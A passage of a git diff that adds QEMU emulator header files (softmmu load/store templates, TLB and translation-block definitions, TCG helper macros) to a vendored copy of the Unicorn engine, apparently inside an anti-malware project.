+ * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ +#if DATA_SIZE == 8 +#define SUFFIX q +#define USUFFIX q +#define DATA_TYPE uint64_t +#elif DATA_SIZE == 4 +#define SUFFIX l +#define USUFFIX l +#define DATA_TYPE uint32_t +#elif DATA_SIZE == 2 +#define SUFFIX w +#define USUFFIX uw +#define DATA_TYPE uint16_t +#define DATA_STYPE int16_t +#elif DATA_SIZE == 1 +#define SUFFIX b +#define USUFFIX ub +#define DATA_TYPE uint8_t +#define DATA_STYPE int8_t +#else +#error unsupported data size +#endif + +#if DATA_SIZE == 8 +#define RES_TYPE uint64_t +#else +#define RES_TYPE uint32_t +#endif + +#ifdef SOFTMMU_CODE_ACCESS +#define ADDR_READ addr_code +#define MMUSUFFIX _cmmu +#else +#define ADDR_READ addr_read +#define MMUSUFFIX _mmu +#endif + +/* generic load/store macros */ + +static inline RES_TYPE +glue(glue(cpu_ld, USUFFIX), MEMSUFFIX)(CPUArchState *env, target_ulong ptr) +{ + int page_index; + RES_TYPE res; + target_ulong addr; + int mmu_idx; + + addr = ptr; + page_index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + mmu_idx = CPU_MMU_INDEX; + if (unlikely(env->tlb_table[mmu_idx][page_index].ADDR_READ != + (addr & (TARGET_PAGE_MASK | (DATA_SIZE - 1))))) { + res = glue(glue(helper_ld, SUFFIX), MMUSUFFIX)(env, addr, mmu_idx); + } else { + uintptr_t hostaddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][page_index].addend); + res = glue(glue(ld, USUFFIX), _raw)(hostaddr); + } + return res; +} + +#if DATA_SIZE <= 2 +static inline int +glue(glue(cpu_lds, SUFFIX), MEMSUFFIX)(CPUArchState *env, target_ulong ptr) +{ + int res, page_index; + target_ulong addr; + int mmu_idx; + + addr = ptr; + page_index = (addr 
>> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + mmu_idx = CPU_MMU_INDEX; + if (unlikely(env->tlb_table[mmu_idx][page_index].ADDR_READ != + (addr & (TARGET_PAGE_MASK | (DATA_SIZE - 1))))) { + res = (DATA_STYPE)glue(glue(helper_ld, SUFFIX), + MMUSUFFIX)(env, addr, mmu_idx); + } else { + uintptr_t hostaddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][page_index].addend); + res = glue(glue(lds, SUFFIX), _raw)(hostaddr); + } + return res; +} +#endif + +#ifndef SOFTMMU_CODE_ACCESS + +/* generic store macro */ + +static inline void +glue(glue(cpu_st, SUFFIX), MEMSUFFIX)(CPUArchState *env, target_ulong ptr, + RES_TYPE v) +{ + int page_index; + target_ulong addr; + int mmu_idx; + + addr = ptr; + page_index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + mmu_idx = CPU_MMU_INDEX; + if (unlikely(env->tlb_table[mmu_idx][page_index].addr_write != + (addr & (TARGET_PAGE_MASK | (DATA_SIZE - 1))))) { + glue(glue(helper_st, SUFFIX), MMUSUFFIX)(env, addr, v, mmu_idx); + } else { + uintptr_t hostaddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][page_index].addend); + glue(glue(st, SUFFIX), _raw)(hostaddr, v); + } +} + + + +#if DATA_SIZE == 8 +static inline float64 glue(cpu_ldfq, MEMSUFFIX)(CPUArchState *env, + target_ulong ptr) +{ + union { + float64 d; + uint64_t i; + } u; + u.i = glue(cpu_ldq, MEMSUFFIX)(env, ptr); + return u.d; +} + +static inline void glue(cpu_stfq, MEMSUFFIX)(CPUArchState *env, + target_ulong ptr, float64 v) +{ + union { + float64 d; + uint64_t i; + } u; + u.d = v; + glue(cpu_stq, MEMSUFFIX)(env, ptr, u.i); +} +#endif /* DATA_SIZE == 8 */ + +#if DATA_SIZE == 4 +static inline float32 glue(cpu_ldfl, MEMSUFFIX)(CPUArchState *env, + target_ulong ptr) +{ + union { + float32 f; + uint32_t i; + } u; + u.i = glue(cpu_ldl, MEMSUFFIX)(env, ptr); + return u.f; +} + +static inline void glue(cpu_stfl, MEMSUFFIX)(CPUArchState *env, + target_ulong ptr, float32 v) +{ + union { + float32 f; + uint32_t i; + } u; + u.f = v; + glue(cpu_stl, MEMSUFFIX)(env, ptr, u.i); +} +#endif /* 
DATA_SIZE == 4 */ + +#endif /* !SOFTMMU_CODE_ACCESS */ + +#undef RES_TYPE +#undef DATA_TYPE +#undef DATA_STYPE +#undef SUFFIX +#undef USUFFIX +#undef DATA_SIZE +#undef MMUSUFFIX +#undef ADDR_READ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cputlb.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cputlb.h new file mode 100644 index 0000000..1a43d32 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cputlb.h @@ -0,0 +1,48 @@ +/* + * Common CPU TLB handling + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
+ */ +#ifndef CPUTLB_H +#define CPUTLB_H + +#if !defined(CONFIG_USER_ONLY) +/* cputlb.c */ +void tlb_protect_code(struct uc_struct *uc, ram_addr_t ram_addr); +void tlb_unprotect_code_phys(CPUState *cpu, ram_addr_t ram_addr, + target_ulong vaddr); +void tlb_reset_dirty_range(CPUTLBEntry *tlb_entry, + uintptr_t start, uintptr_t length); +void cpu_tlb_reset_dirty_all(struct uc_struct *uc, ram_addr_t start1, ram_addr_t length); +void tlb_set_dirty(CPUArchState *env, target_ulong vaddr); +//extern int tlb_flush_count; + +/* exec.c */ +void tb_flush_jmp_cache(CPUState *cpu, target_ulong addr); + +MemoryRegionSection * +address_space_translate_for_iotlb(AddressSpace *as, hwaddr addr, hwaddr *xlat, + hwaddr *plen); +hwaddr memory_region_section_get_iotlb(CPUState *cpu, + MemoryRegionSection *section, + target_ulong vaddr, + hwaddr paddr, hwaddr xlat, + int prot, + target_ulong *address); +bool memory_region_is_unassigned(struct uc_struct* uc, MemoryRegion *mr); + +#endif +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/exec-all.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/exec-all.h new file mode 100644 index 0000000..e839825 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/exec-all.h @@ -0,0 +1,379 @@ +/* + * internal execution defines for qemu + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
+ * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +#ifndef _EXEC_ALL_H_ +#define _EXEC_ALL_H_ + +#include "qemu-common.h" + +/* allow to see translation results - the slowdown should be negligible, so we leave it */ +#define DEBUG_DISAS + +/* Page tracking code uses ram addresses in system mode, and virtual + addresses in userspace mode. Define tb_page_addr_t to be an appropriate + type. */ +#if defined(CONFIG_USER_ONLY) +typedef abi_ulong tb_page_addr_t; +#else +typedef ram_addr_t tb_page_addr_t; +#endif + +/* is_jmp field values */ +#define DISAS_NEXT 0 /* next instruction can be analyzed */ +#define DISAS_JUMP 1 /* only pc was modified dynamically */ +#define DISAS_UPDATE 2 /* cpu state was modified dynamically */ +#define DISAS_TB_JUMP 3 /* only pc was modified statically */ + +struct TranslationBlock; +typedef struct TranslationBlock TranslationBlock; + +/* XXX: make safe guess about sizes */ +#define MAX_OP_PER_INSTR 266 + +#if HOST_LONG_BITS == 32 +#define MAX_OPC_PARAM_PER_ARG 2 +#else +#define MAX_OPC_PARAM_PER_ARG 1 +#endif +#define MAX_OPC_PARAM_IARGS 5 +#define MAX_OPC_PARAM_OARGS 1 +#define MAX_OPC_PARAM_ARGS (MAX_OPC_PARAM_IARGS + MAX_OPC_PARAM_OARGS) + +/* A Call op needs up to 4 + 2N parameters on 32-bit archs, + * and up to 4 + N parameters on 64-bit archs + * (N = number of input arguments + output arguments). */ +#define MAX_OPC_PARAM (4 + (MAX_OPC_PARAM_PER_ARG * MAX_OPC_PARAM_ARGS)) +#define OPC_MAX_SIZE (OPC_BUF_SIZE - MAX_OP_PER_INSTR) + +/* Maximum size a TCG op can expand to. This is complicated because a + single op may require several host instructions and register reloads. + For now take a wild guess at 192 bytes, which should allow at least + a couple of fixup instructions per argument. 
*/ +#define TCG_MAX_OP_SIZE 192 + +#define OPPARAM_BUF_SIZE (OPC_BUF_SIZE * MAX_OPC_PARAM) + +#include "qemu/log.h" + +void gen_intermediate_code(CPUArchState *env, struct TranslationBlock *tb); +void gen_intermediate_code_pc(CPUArchState *env, struct TranslationBlock *tb); +void restore_state_to_opc(CPUArchState *env, struct TranslationBlock *tb, + int pc_pos); +bool cpu_restore_state(CPUState *cpu, uintptr_t searched_pc); + +void QEMU_NORETURN cpu_resume_from_signal(CPUState *cpu, void *puc); + +void QEMU_NORETURN cpu_io_recompile(CPUState *cpu, uintptr_t retaddr); +TranslationBlock *tb_gen_code(CPUState *cpu, + target_ulong pc, target_ulong cs_base, int flags, + int cflags); +void cpu_exec_init(CPUArchState *env, void *opaque); + +void QEMU_NORETURN cpu_loop_exit(CPUState *cpu); + +void tb_invalidate_phys_page_range(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end, + int is_cpu_write_access); +void tb_invalidate_phys_range(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end, + int is_cpu_write_access); +#if !defined(CONFIG_USER_ONLY) +void tcg_cpu_address_space_init(CPUState *cpu, AddressSpace *as); +/* cputlb.c */ +void tlb_flush_page(CPUState *cpu, target_ulong addr); +void tlb_flush(CPUState *cpu, int flush_global); +void tlb_set_page(CPUState *cpu, target_ulong vaddr, + hwaddr paddr, int prot, + int mmu_idx, target_ulong size); + +void tb_invalidate_phys_addr(AddressSpace *as, hwaddr addr); + +#else +static inline void tlb_flush_page(CPUState *cpu, target_ulong addr) +{ +} + +static inline void tlb_flush(CPUState *cpu, int flush_global) +{ +} +#endif + +#define CODE_GEN_ALIGN 16 /* must be >= of the size of a icache line */ + +#define CODE_GEN_PHYS_HASH_BITS 15 +#define CODE_GEN_PHYS_HASH_SIZE (1 << CODE_GEN_PHYS_HASH_BITS) + +/* estimated block size for TB allocation */ +/* XXX: use a per code average code fragment size and modulate it + according to the host CPU */ +#if defined(CONFIG_SOFTMMU) +#define CODE_GEN_AVG_BLOCK_SIZE 128 
+#else +#define CODE_GEN_AVG_BLOCK_SIZE 64 +#endif + +#if defined(__arm__) || defined(_ARCH_PPC) \ + || defined(__x86_64__) || defined(__i386__) \ + || defined(__sparc__) || defined(__aarch64__) \ + || defined(__s390x__) || defined(__mips__) \ + || defined(CONFIG_TCG_INTERPRETER) +#define USE_DIRECT_JUMP +#endif + +struct TranslationBlock { + target_ulong pc; /* simulated PC corresponding to this block (EIP + CS base) */ + target_ulong cs_base; /* CS base for this block */ + uint64_t flags; /* flags defining in which context the code was generated */ + uint16_t size; /* size of target code for this block (1 <= + size <= TARGET_PAGE_SIZE) */ + uint16_t cflags; /* compile flags */ +#define CF_COUNT_MASK 0x7fff +#define CF_LAST_IO 0x8000 /* Last insn may be an IO access. */ + + void *tc_ptr; /* pointer to the translated code */ + /* next matching tb for physical address. */ + struct TranslationBlock *phys_hash_next; + /* first and second physical page containing code. The lower bit + of the pointer tells the index in page_next[] */ + struct TranslationBlock *page_next[2]; + tb_page_addr_t page_addr[2]; + + /* the following data are used to directly call another TB from + the code of this one. */ + uint16_t tb_next_offset[2]; /* offset of original jump target */ +#ifdef USE_DIRECT_JUMP + uint16_t tb_jmp_offset[2]; /* offset of jump instruction */ +#else + uintptr_t tb_next[2]; /* address of jump generated code */ +#endif + /* list of TBs jumping to this one. 
This is a circular list using + the two least significant bits of the pointers to tell what is + the next pointer: 0 = jmp_next[0], 1 = jmp_next[1], 2 = + jmp_first */ + struct TranslationBlock *jmp_next[2]; + struct TranslationBlock *jmp_first; + uint32_t icount; +}; + +typedef struct TBContext TBContext; + +struct TBContext { + + TranslationBlock *tbs; + TranslationBlock *tb_phys_hash[CODE_GEN_PHYS_HASH_SIZE]; + int nb_tbs; + + /* statistics */ + int tb_flush_count; + int tb_phys_invalidate_count; + + int tb_invalidated_flag; +}; + +static inline unsigned int tb_jmp_cache_hash_page(target_ulong pc) +{ + target_ulong tmp; + tmp = pc ^ (pc >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)); + return (tmp >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)) & TB_JMP_PAGE_MASK; +} + +static inline unsigned int tb_jmp_cache_hash_func(target_ulong pc) +{ + target_ulong tmp; + tmp = pc ^ (pc >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)); + return (((tmp >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)) & TB_JMP_PAGE_MASK) + | (tmp & TB_JMP_ADDR_MASK)); +} + +static inline unsigned int tb_phys_hash_func(tb_page_addr_t pc) +{ + return (pc >> 2) & (CODE_GEN_PHYS_HASH_SIZE - 1); +} + +void tb_free(struct uc_struct *uc, TranslationBlock *tb); +void tb_flush(CPUArchState *env); +void tb_phys_invalidate(struct uc_struct *uc, + TranslationBlock *tb, tb_page_addr_t page_addr); + +#if defined(USE_DIRECT_JUMP) + +#if defined(CONFIG_TCG_INTERPRETER) +static inline void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ + /* patch the branch destination */ + *(uint32_t *)jmp_addr = addr - (jmp_addr + 4); + /* no need to flush icache explicitly */ +} +#elif defined(_ARCH_PPC) +void ppc_tb_set_jmp_target(uintptr_t jmp_addr, uintptr_t addr); +#define tb_set_jmp_target1 ppc_tb_set_jmp_target +#elif defined(__i386__) || defined(__x86_64__) +static inline void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ + /* patch the branch destination */ + stl_le_p((void*)jmp_addr, addr - (jmp_addr + 4)); + /* no 
need to flush icache explicitly */ +} +#elif defined(__s390x__) +static inline void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ + /* patch the branch destination */ + intptr_t disp = addr - (jmp_addr - 2); + stl_be_p((void*)jmp_addr, disp / 2); + /* no need to flush icache explicitly */ +} +#elif defined(__aarch64__) +void aarch64_tb_set_jmp_target(uintptr_t jmp_addr, uintptr_t addr); +#define tb_set_jmp_target1 aarch64_tb_set_jmp_target +#elif defined(__arm__) +static inline void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ +#if !QEMU_GNUC_PREREQ(4, 1) + register unsigned long _beg __asm ("a1"); + register unsigned long _end __asm ("a2"); + register unsigned long _flg __asm ("a3"); +#endif + + /* we could use a ldr pc, [pc, #-4] kind of branch and avoid the flush */ + *(uint32_t *)jmp_addr = + (*(uint32_t *)jmp_addr & ~0xffffff) + | (((addr - (jmp_addr + 8)) >> 2) & 0xffffff); + +#if QEMU_GNUC_PREREQ(4, 1) + __builtin___clear_cache((char *) jmp_addr, (char *) jmp_addr + 4); +#else + /* flush icache */ + _beg = jmp_addr; + _end = jmp_addr + 4; + _flg = 0; + __asm __volatile__ ("swi 0x9f0002" : : "r" (_beg), "r" (_end), "r" (_flg)); +#endif +} +#elif defined(__sparc__) || defined(__mips__) +void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr); +#else +#error tb_set_jmp_target1 is missing +#endif + +static inline void tb_set_jmp_target(TranslationBlock *tb, + int n, uintptr_t addr) +{ + uint16_t offset = tb->tb_jmp_offset[n]; + tb_set_jmp_target1((uintptr_t)((char*)tb->tc_ptr + offset), addr); +} + +#else + +/* set the jump target */ +static inline void tb_set_jmp_target(TranslationBlock *tb, + int n, uintptr_t addr) +{ + tb->tb_next[n] = addr; +} + +#endif + +static inline void tb_add_jump(TranslationBlock *tb, int n, + TranslationBlock *tb_next) +{ + /* NOTE: this test is only needed for thread safety */ + if (!tb->jmp_next[n]) { + /* patch the native jump address */ + tb_set_jmp_target(tb, n, (uintptr_t)tb_next->tc_ptr); + + /* 
add in TB jmp circular list */ + tb->jmp_next[n] = tb_next->jmp_first; + tb_next->jmp_first = (TranslationBlock *)((uintptr_t)(tb) | (n)); + } +} + +/* GETRA is the true target of the return instruction that we'll execute, + defined here for simplicity of defining the follow-up macros. */ +#if defined(CONFIG_TCG_INTERPRETER) +extern uintptr_t tci_tb_ptr; +# define GETRA() tci_tb_ptr +#elif defined(_MSC_VER) +#include <intrin.h> +# define GETRA() (uintptr_t)_ReturnAddress() +#else +# define GETRA() \ + ((uintptr_t)__builtin_extract_return_addr(__builtin_return_address(0))) +#endif + +/* The true return address will often point to a host insn that is part of + the next translated guest insn. Adjust the address backward to point to + the middle of the call insn. Subtracting one would do the job except for + several compressed mode architectures (arm, mips) which set the low bit + to indicate the compressed mode; subtracting two works around that. It + is also the case that there are no host isas that contain a call insn + smaller than 4 bytes, so we don't worry about special-casing this. 
*/ +#if defined(CONFIG_TCG_INTERPRETER) +# define GETPC_ADJ 0 +#else +# define GETPC_ADJ 2 +#endif + +#define GETPC() (GETRA() - GETPC_ADJ) + +#if !defined(CONFIG_USER_ONLY) + +void phys_mem_set_alloc(void *(*alloc)(size_t, uint64_t *align)); + +struct MemoryRegion *iotlb_to_region(AddressSpace *as, hwaddr index); +bool io_mem_read(struct MemoryRegion *mr, hwaddr addr, + uint64_t *pvalue, unsigned size); +bool io_mem_write(struct MemoryRegion *mr, hwaddr addr, + uint64_t value, unsigned size); + + +void tlb_fill(CPUState *cpu, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr); +#endif + +#if defined(CONFIG_USER_ONLY) +static inline tb_page_addr_t get_page_addr_code(CPUArchState *env1, target_ulong addr) +{ + return addr; +} +#else +/* cputlb.c */ +tb_page_addr_t get_page_addr_code(CPUArchState *env1, target_ulong addr); +#endif + +/* vl.c */ +extern int singlestep; + +/* cpu-exec.c */ +extern volatile sig_atomic_t exit_request; + +/** + * cpu_can_do_io: + * @cpu: The CPU for which to check IO. + * + * Deterministic execution requires that IO only be performed on the last + * instruction of a TB so that interrupts take effect immediately. + * + * Returns: %true if memory-mapped IO is safe, %false otherwise. + */ +static inline bool cpu_can_do_io(CPUState *cpu) +{ + return true; +} + +void phys_mem_clean(struct uc_struct* uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/gen-icount.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/gen-icount.h new file mode 100644 index 0000000..bbbc5de --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/gen-icount.h @@ -0,0 +1,72 @@ +#ifndef GEN_ICOUNT_H +#define GEN_ICOUNT_H 1 + +#include "qemu/timer.h" + +/* Helpers for instruction counting code generation. 
*/ + +//static TCGArg *icount_arg; +//static int icount_label; + +static inline void gen_tb_start(TCGContext *tcg_ctx) +{ + // TCGv_i32 count; + TCGv_i32 flag; + + tcg_ctx->exitreq_label = gen_new_label(tcg_ctx); + flag = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, flag, tcg_ctx->cpu_env, + offsetof(CPUState, tcg_exit_req) - ENV_OFFSET); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, flag, 0, tcg_ctx->exitreq_label); + tcg_temp_free_i32(tcg_ctx, flag); + +#if 0 + if (!use_icount) + return; + + icount_label = gen_new_label(); + count = tcg_temp_local_new_i32(); + tcg_gen_ld_i32(count, cpu_env, + -ENV_OFFSET + offsetof(CPUState, icount_decr.u32)); + /* This is a horrid hack to allow fixing up the value later. */ + icount_arg = tcg_ctx.gen_opparam_ptr + 1; + tcg_gen_subi_i32(count, count, 0xdeadbeef); + + tcg_gen_brcondi_i32(TCG_COND_LT, count, 0, icount_label); + tcg_gen_st16_i32(count, cpu_env, + -ENV_OFFSET + offsetof(CPUState, icount_decr.u16.low)); + tcg_temp_free_i32(count); +#endif +} + +static inline void gen_tb_end(TCGContext *tcg_ctx, TranslationBlock *tb, int num_insns) +{ + gen_set_label(tcg_ctx, tcg_ctx->exitreq_label); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + TB_EXIT_REQUESTED); + +#if 0 + if (use_icount) { + *icount_arg = num_insns; + gen_set_label(icount_label); + tcg_gen_exit_tb((uintptr_t)tb + TB_EXIT_ICOUNT_EXPIRED); + } +#endif +} + +#if 0 +static inline void gen_io_start(void) +{ + TCGv_i32 tmp = tcg_const_i32(1); + tcg_gen_st_i32(tmp, cpu_env, -ENV_OFFSET + offsetof(CPUState, can_do_io)); + tcg_temp_free_i32(tmp); +} + +static inline void gen_io_end(void) +{ + TCGv_i32 tmp = tcg_const_i32(0); + tcg_gen_st_i32(tmp, cpu_env, -ENV_OFFSET + offsetof(CPUState, can_do_io)); + tcg_temp_free_i32(tmp); +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-gen.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-gen.h new file mode 100644 index 0000000..df3ea61 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-gen.h @@ -0,0 +1,70 @@ +/* Helper file for declaring TCG helper functions. + This one expands generation functions for tcg opcodes. */ + +#ifndef HELPER_GEN_H +#define HELPER_GEN_H 1 + +#include <exec/helper-head.h> + +#define DEF_HELPER_FLAGS_0(name, flags, ret) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl0(ret)) \ +{ \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 0, NULL); \ +} + +#define DEF_HELPER_FLAGS_1(name, flags, ret, t1) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ + dh_arg_decl(t1, 1)) \ +{ \ + TCGArg args[1] = { dh_arg(t1, 1) }; \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 1, args); \ +} + +#define DEF_HELPER_FLAGS_2(name, flags, ret, t1, t2) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ + dh_arg_decl(t1, 1), dh_arg_decl(t2, 2)) \ +{ \ + TCGArg args[2] = { dh_arg(t1, 1), dh_arg(t2, 2) }; \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 2, args); \ +} + +#define DEF_HELPER_FLAGS_3(name, flags, ret, t1, t2, t3) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ + dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3)) \ +{ \ + TCGArg args[3] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3) }; \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 3, args); \ +} + +#define DEF_HELPER_FLAGS_4(name, flags, ret, t1, t2, t3, t4) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ + dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), \ + dh_arg_decl(t3, 3), dh_arg_decl(t4, 4)) \ +{ \ + TCGArg args[4] = { dh_arg(t1, 1), dh_arg(t2, 2), \ + dh_arg(t3, 3), dh_arg(t4, 4) }; \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 4, args); \ +} + +#define DEF_HELPER_FLAGS_5(name, flags, ret, t1, t2, t3, t4, t5) \ +static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, 
dh_retvar_decl(ret) \ + dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3), \ + dh_arg_decl(t4, 4), dh_arg_decl(t5, 5)) \ +{ \ + TCGArg args[5] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3), \ + dh_arg(t4, 4), dh_arg(t5, 5) }; \ + tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 5, args); \ +} + +#include "helper.h" +#include "tcg-runtime.h" + +#undef DEF_HELPER_FLAGS_0 +#undef DEF_HELPER_FLAGS_1 +#undef DEF_HELPER_FLAGS_2 +#undef DEF_HELPER_FLAGS_3 +#undef DEF_HELPER_FLAGS_4 +#undef DEF_HELPER_FLAGS_5 +#undef GEN_HELPER + +#endif /* HELPER_GEN_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-head.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-head.h new file mode 100644 index 0000000..b009ccb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/helper-head.h @@ -0,0 +1,134 @@ +/* Helper file for declaring TCG helper functions. + Used by other helper files. + + Targets should use DEF_HELPER_N and DEF_HELPER_FLAGS_N to declare helper + functions. Names should be specified without the helper_ prefix, and + the return and argument types specified. 3 basic types are understood + (i32, i64 and ptr). Additional aliases are provided for convenience and + to match the types used by the C helper implementation. + + The target helper.h should be included in all files that use/define + helper functions. THis will ensure that function prototypes are + consistent. In addition it should be included an extra two times for + helper.c, defining: + GEN_HELPER 1 to produce op generation functions (gen_helper_*) + GEN_HELPER 2 to do runtime registration helper functions. + */ + +#ifndef DEF_HELPER_H +#define DEF_HELPER_H 1 + +#include "qemu/osdep.h" + +#define HELPER(name) glue(helper_, name) + +#define GET_TCGV_i32 GET_TCGV_I32 +#define GET_TCGV_i64 GET_TCGV_I64 +#define GET_TCGV_ptr GET_TCGV_PTR + +/* Some types that make sense in C, but not for TCG. 
*/ +#define dh_alias_i32 i32 +#define dh_alias_s32 i32 +#define dh_alias_int i32 +#define dh_alias_i64 i64 +#define dh_alias_s64 i64 +#define dh_alias_f32 i32 +#define dh_alias_f64 i64 +#ifdef TARGET_LONG_BITS +# if TARGET_LONG_BITS == 32 +# define dh_alias_tl i32 +# else +# define dh_alias_tl i64 +# endif +#endif +#define dh_alias_ptr ptr +#define dh_alias_void void +#define dh_alias_noreturn noreturn +#define dh_alias_env ptr +#define dh_alias(t) glue(dh_alias_, t) + +#define dh_ctype_i32 uint32_t +#define dh_ctype_s32 int32_t +#define dh_ctype_int int +#define dh_ctype_i64 uint64_t +#define dh_ctype_s64 int64_t +#define dh_ctype_f32 float32 +#define dh_ctype_f64 float64 +#define dh_ctype_tl target_ulong +#define dh_ctype_ptr void * +#define dh_ctype_void void +#define dh_ctype_noreturn void QEMU_NORETURN +#define dh_ctype_env CPUArchState * +#define dh_ctype(t) dh_ctype_##t + +/* We can't use glue() here because it falls foul of C preprocessor + recursive expansion rules. */ +#define dh_retvar_decl0_void void +#define dh_retvar_decl0_noreturn void +#define dh_retvar_decl0_i32 TCGv_i32 retval +#define dh_retvar_decl0_i64 TCGv_i64 retval +#define dh_retvar_decl0_ptr TCGv_ptr retval +#define dh_retvar_decl0(t) glue(dh_retvar_decl0_, dh_alias(t)) + +#define dh_retvar_decl_void +#define dh_retvar_decl_noreturn +#define dh_retvar_decl_i32 TCGv_i32 retval, +#define dh_retvar_decl_i64 TCGv_i64 retval, +#define dh_retvar_decl_ptr TCGv_ptr retval, +#define dh_retvar_decl(t) glue(dh_retvar_decl_, dh_alias(t)) + +#define dh_retvar_void TCG_CALL_DUMMY_ARG +#define dh_retvar_noreturn TCG_CALL_DUMMY_ARG +#define dh_retvar_i32 GET_TCGV_i32(retval) +#define dh_retvar_i64 GET_TCGV_i64(retval) +#define dh_retvar_ptr GET_TCGV_ptr(retval) +#define dh_retvar(t) glue(dh_retvar_, dh_alias(t)) + +#define dh_is_64bit_void 0 +#define dh_is_64bit_noreturn 0 +#define dh_is_64bit_i32 0 +#define dh_is_64bit_i64 1 +#define dh_is_64bit_ptr (sizeof(void *) == 8) +#define dh_is_64bit(t) 
glue(dh_is_64bit_, dh_alias(t)) + +#define dh_is_signed_void 0 +#define dh_is_signed_noreturn 0 +#define dh_is_signed_i32 0 +#define dh_is_signed_s32 1 +#define dh_is_signed_i64 0 +#define dh_is_signed_s64 1 +#define dh_is_signed_f32 0 +#define dh_is_signed_f64 0 +#define dh_is_signed_tl 0 +#define dh_is_signed_int 1 +/* ??? This is highly specific to the host cpu. There are even special + extension instructions that may be required, e.g. ia64's addp4. But + for now we don't support any 64-bit targets with 32-bit pointers. */ +#define dh_is_signed_ptr 0 +#define dh_is_signed_env dh_is_signed_ptr +#define dh_is_signed(t) dh_is_signed_##t + +#define dh_sizemask(t, n) \ + ((dh_is_64bit(t) << (n*2)) | (dh_is_signed(t) << (n*2+1))) + +#define dh_arg(t, n) \ + glue(GET_TCGV_, dh_alias(t))(glue(arg, n)) + +#define dh_arg_decl(t, n) glue(TCGv_, dh_alias(t)) glue(arg, n) + +#define DEF_HELPER_0(name, ret) \ + DEF_HELPER_FLAGS_0(name, 0, ret) +#define DEF_HELPER_1(name, ret, t1) \ + 